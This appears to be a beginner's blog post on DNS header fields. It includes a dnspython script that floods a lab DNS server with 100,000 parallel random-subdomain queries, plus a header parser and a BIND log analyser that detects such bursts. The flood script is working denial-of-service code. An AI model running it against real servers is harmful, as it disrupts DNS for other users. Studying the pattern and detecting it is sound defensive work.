DNS traffic attacks via Python's Dnspython module

Source: Internet
Author: User
Tags: response code domain name server

One

  I am a beginner, slowly feeling my way as I learn.

Install the module: pip install dnspython

Using Python and the dnspython module, I wrote a small DNS attack script. The target IP is my own DNS server. The script can read the flag values returned in the DNS response; it can also be used just to view those return values, although in practice that is not much use.

The DNS message format is roughly as follows:

(1) Common message header format. The header is always present; the other sections are not part of the header:

ID: a 16-bit identifier set by the requesting client. The server copies the same value into its answer so that the client can match responses to requests.

QR: 1 bit that distinguishes a request (0) from an answer (1).

OPCODE: 4 bits that set the type of query; the answer carries the same value. The following values are available:

0 Standard query (QUERY)

1 Inverse query (IQUERY)

2 Server status request (STATUS)

3-15 Reserved, not currently used

AA, Authoritative Answer: this bit is meaningful in an answer and indicates that the responding server is an authoritative name server for the queried domain name.

Note: because of aliases, an answer may contain more than one owner name. The AA bit corresponds to the name that matches the query name, or to the first owner name in the answer.

TC, Truncation: indicates that the message was longer than the permitted length and was truncated.

RD, Recursion Desired: this bit may be set in a request and is copied into the answer. If RD is set, it directs the name server to resolve the query recursively. Support for recursive queries is optional.

RA, Recursion Available: set or cleared in an answer to indicate whether the server supports recursive queries.

Z: reserved, not currently used. Must be set to 0 in all requests and answers.

RCODE, Response code: these 4 bits are set in the answer, with the following meanings:

0 No error.

1 Format error: the server could not interpret the request.

2 Server failure: the request was not processed because of a problem with the server.

3 Name error: meaningful only in answers from an authoritative name server; the domain name in the query does not exist.

4 Not implemented: the name server does not support the requested kind of query.

5 Refused: the server refuses to answer for policy reasons. For example, the server may not want to answer certain requesters, or may not want to perform certain operations (such as a zone transfer).

6-15 Reserved, not currently used.

QDCOUNT (number of questions): unsigned 16-bit integer giving the number of entries in the question section of the message.

ANCOUNT (number of answer records): unsigned 16-bit integer giving the number of resource records in the answer section.

NSCOUNT (number of authority records): unsigned 16-bit integer giving the number of resource records in the authority section.

ARCOUNT (number of additional records): unsigned 16-bit integer giving the number of resource records in the additional section.
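The header layout above can be decoded with a few shifts and masks. The following is an added example, not code from the original post; the function name and both sample headers are constructed for illustration.

```python
import struct

OPCODES = {0: "QUERY", 1: "IQUERY", 2: "STATUS"}
RCODES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL",
          3: "NXDOMAIN", 4: "NOTIMP", 5: "REFUSED"}


def parse_dns_header(packet: bytes) -> dict:
    """Decode the fixed 12-byte DNS header: ID, flags word, four counts."""
    if len(packet) < 12:
        raise ValueError("DNS header needs 12 bytes, got %d" % len(packet))
    # Six unsigned 16-bit integers in network (big-endian) byte order.
    ident, flags, qd, an, ns, ar = struct.unpack("!6H", packet[:12])
    opcode = (flags >> 11) & 0xF   # bits 14..11
    rcode = flags & 0xF            # bits 3..0
    return {
        "id": ident,
        "qr": (flags >> 15) & 1,   # 0 = request, 1 = answer
        "opcode": OPCODES.get(opcode, "RESERVED(%d)" % opcode),
        "aa": bool(flags & 0x0400),
        "tc": bool(flags & 0x0200),
        "rd": bool(flags & 0x0100),
        "ra": bool(flags & 0x0080),
        "z": (flags >> 4) & 0x7,   # reserved bits as described above
        "rcode": RCODES.get(rcode, "RESERVED(%d)" % rcode),
        "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar,
    }


# Constructed samples: a recursive query, and the answer saying that the
# name does not exist (QR=1, RD=1, RA=1, RCODE=3, one authority record).
SAMPLE_QUERY = bytes.fromhex("1a2b" "0100" "0001" "0000" "0000" "0000")
SAMPLE_NXDOMAIN = bytes.fromhex("1a2b" "8183" "0001" "0000" "0001" "0000")

if __name__ == "__main__":
    for name, pkt in (("query", SAMPLE_QUERY), ("answer", SAMPLE_NXDOMAIN)):
        print(name, parse_dns_header(pkt))
```

Answers with RCODE 3 and the same ID as the request are what a server returns for each nonexistent random name, so this field is the one to watch when reading captures of such traffic.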

To tell the truth, a beginner like me cannot really understand all of this.

Here is my small script; it is actually very simple. For the dnspython module, see https://www.cnblogs.com/nicholas-920610/articles/7149057.html

    from dns import message, query
    import random
    import string
    import multiprocessing
    import threading


    def flagcount(flags, pos):
        # True if bit `pos` of the 16-bit DNS flags word is set
        if int(flags / (2 ** pos)) % 2 == 1:
            return True
        else:
            return False


    def getflags(flags):
        # Bit positions of the flags within the header flags word
        qr_pos = 15
        aa_pos = 10
        tc_pos = 9
        rd_pos = 8
        ra_pos = 7
        qr_flag = flagcount(flags, qr_pos)
        aa_flag = flagcount(flags, aa_pos)
        tc_flag = flagcount(flags, tc_pos)
        rd_flag = flagcount(flags, rd_pos)
        ra_flag = flagcount(flags, ra_pos)
        flag_dic = {"QR": qr_flag, "AA": aa_flag, "TC": tc_flag,
                    "RD": rd_flag, "RA": ra_flag}
        for flag, v in flag_dic.items():
            print(flag, ':', v)


    def attack(domain_name):
        server = '192.168.32.128'
        port = 53
        dns_query = message.make_query(domain_name, 'A')
        # port must be passed by keyword: the third positional
        # argument of query.udp() is the timeout, not the port
        response = query.udp(dns_query, server, port=port)
        # print(response)


    def generate_random_name():
        # 3 to 10 distinct characters drawn from a-z and 0-9
        ch = list(string.ascii_lowercase) + list(map(str, range(10)))
        rand_ch = random.sample(ch, random.randint(3, 10))
        return ''.join(rand_ch)


    def start_attack():
        domain_name = generate_random_name() + '.hjc.com'
        attack(domain_name)
        print(domain_name)


    if __name__ == '__main__':
        p = multiprocessing.Pool(processes=multiprocessing.cpu_count())
        for _ in range(100000):
            p.apply_async(start_attack)
        p.close()
        p.join()
        # print(response)
        # for content in response.answer:
        #     print(content.to_text())
        # getflags(response.flags)

That's how it is; I won't dwell on it.

The generated random domain names look like this:

tozmgde7.hjc.com
u2js79.hjc.com
vru76f.hjc.com
9okeyptud.hjc.com
207lih.hjc.com

BIND is running on my DNS server 192.168.5.128 with the query log enabled; the logged requests look like this:

Combined with awk and similar commands, you can count the number of requests per minute.

That is all. I was just playing around and have not actually tested attack volume in production. I want to work hard and learn from the experts at work and in life.
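The per-minute count can be extended into a detection check for this traffic pattern: many distinct first labels under one parent zone within a minute. This is an added example, not part of the original post; the log layout, the sample lines (including the date and the label k3x9qa) and the thresholds are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed BIND 9 querylog layout; newer releases add "@0x..." after "client".
LINE_RE = re.compile(
    r"^(?P<minute>\d{2}-\w{3}-\d{4} \d{2}:\d{2}):\d{2}\.\d+ "
    r"client (?:@\S+ )?(?P<client>[0-9a-fA-F.:]+)#\d+ "
    r"\([^)]*\): query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)


def summarize(lines, min_queries=5, min_unique_ratio=0.9):
    """Count queries per (minute, parent zone) and flag random-label bursts.

    The parent zone is approximated as the last two labels, and both
    thresholds are illustrative values, not tuned ones.
    """
    buckets = defaultdict(lambda: {"count": 0, "labels": set(), "clients": set()})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip anything that is not a query-log entry
        labels = m["qname"].rstrip(".").lower().split(".")
        bucket = buckets[(m["minute"], ".".join(labels[-2:]))]
        bucket["count"] += 1
        bucket["labels"].add(".".join(labels[:-2]))
        bucket["clients"].add(m["client"])
    report = []
    for (minute, zone), b in sorted(buckets.items()):
        ratio = len(b["labels"]) / b["count"]
        report.append({
            "minute": minute, "zone": zone, "queries": b["count"],
            "unique_labels": len(b["labels"]), "clients": len(b["clients"]),
            "suspect": b["count"] >= min_queries and ratio >= min_unique_ratio,
        })
    return report


def _line(ts, name, client="192.168.32.1"):
    return (f"05-Mar-2018 {ts} client {client}#40001 ({name}): "
            f"query: {name} IN A + (192.168.32.128)")


# Constructed sample log: one random-label burst plus ordinary repeat lookups.
SAMPLE_LOG = (
    [_line(f"10:15:0{i}.100", f"{n}.hjc.com") for i, n in enumerate(
        ["tozmgde7", "u2js79", "vru76f", "9okeyptud", "207lih", "k3x9qa"])]
    + [_line("10:15:30.200", "www.example.org")] * 3
    + [_line("10:16:05.300", "www.hjc.com")] * 4
    + [_line("10:16:06.300", "mail.hjc.com")]
)

if __name__ == "__main__":
    for row in summarize(SAMPLE_LOG):
        print(row)
```

Ordinary traffic repeats a small set of names, so its unique-label ratio stays low even when the per-minute count is high; the burst of never-repeated labels is what marks the row as suspect.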
